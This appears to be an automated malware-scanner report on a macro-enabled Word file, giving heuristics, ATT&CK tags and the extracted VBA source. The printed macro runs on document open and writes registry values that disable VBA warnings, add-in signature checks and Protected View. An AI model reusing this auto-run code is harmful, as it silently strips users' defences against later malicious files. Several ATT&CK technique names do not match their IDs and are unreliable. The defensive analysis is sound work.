MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1546.001 Event Triggered Execution: Event Initialization
T1137.001 Software Deployment: Infrastructure as Code
T1505.003 Server Software Component: Exploit Public-Facing Application
T1204.002 Malicious Link: Malicious File
The sample contains a VBA macro that executes automatically upon opening the document, leveraging `WScript.Shell` and `CreateObject` to modify Office security settings. Specifically, it writes to the registry key `HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings` with a value of 1, effectively disabling VBA warnings. This action is a common precursor to downloading and executing a secondary payload, although no direct download URL was found in the provided evidence.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Public Sub updateSettings() Set wso = CreateObject("WScript.Shell") wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Sub updateSettings() Set wso = CreateObject("WScript.Shell") wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() updateStatus -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2528 bytes |
SHA-256: 9c71a6ce330182df6397587af45cfb87112c5183e70f9cac731dd3994b644eac |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
updateStatus
checkPRR
updateFields
updateSettings
End Sub
Attribute VB_Name = "mod_updateSettings"
Public Sub updateSettings()
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\Trusted Documents\DisableNetworkTrustedDocuments", 0, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\RequireAddinSig", 0, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\ProtectedView\DisableAttachmentsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
With ActiveWindow.View
.RevisionsMode = wdBalloonRevisions
End With
End Sub
Attribute VB_Name = "mod_updateStatus"
Public Sub updateStatus()
Dim customprop As DocumentProperty
For Each customprop In ThisDocument.CustomDocumentProperties
If customprop.Name = "ETQ$CURRENT_PHASE" Then
If customprop.Value = "Draft" Then
customprop.Value = ""
End If
End If
Next customprop
End Sub
Attribute VB_Name = "mod_updateFields"
Public Sub updateFields()
For Each Field In ActiveDocument.Fields
If CStr(Field.Code) Like "*ETQ$CURRENT_PHASE*" Or CStr(Field.Code) Like "*ETQ$REVIEW_DATE*" Then
Field.Update
End If
Next Field
End Sub
Attribute VB_Name = "mod_checkPRR"
Public Sub checkPRR()
Dim customprop As DocumentProperty
For Each customprop In ThisDocument.CustomDocumentProperties
If customprop.Name = "ETQ$REVIEW_DATE" Then
If customprop.Value = " " Then
customprop.Value = "Not Applicable"
End If
End If
Next customprop
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 31232 bytes |
SHA-256: fcf21d3323a7fd9e2c322fa70fbe96cee1b0715df7ce00bc907fc6d06cb68031 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.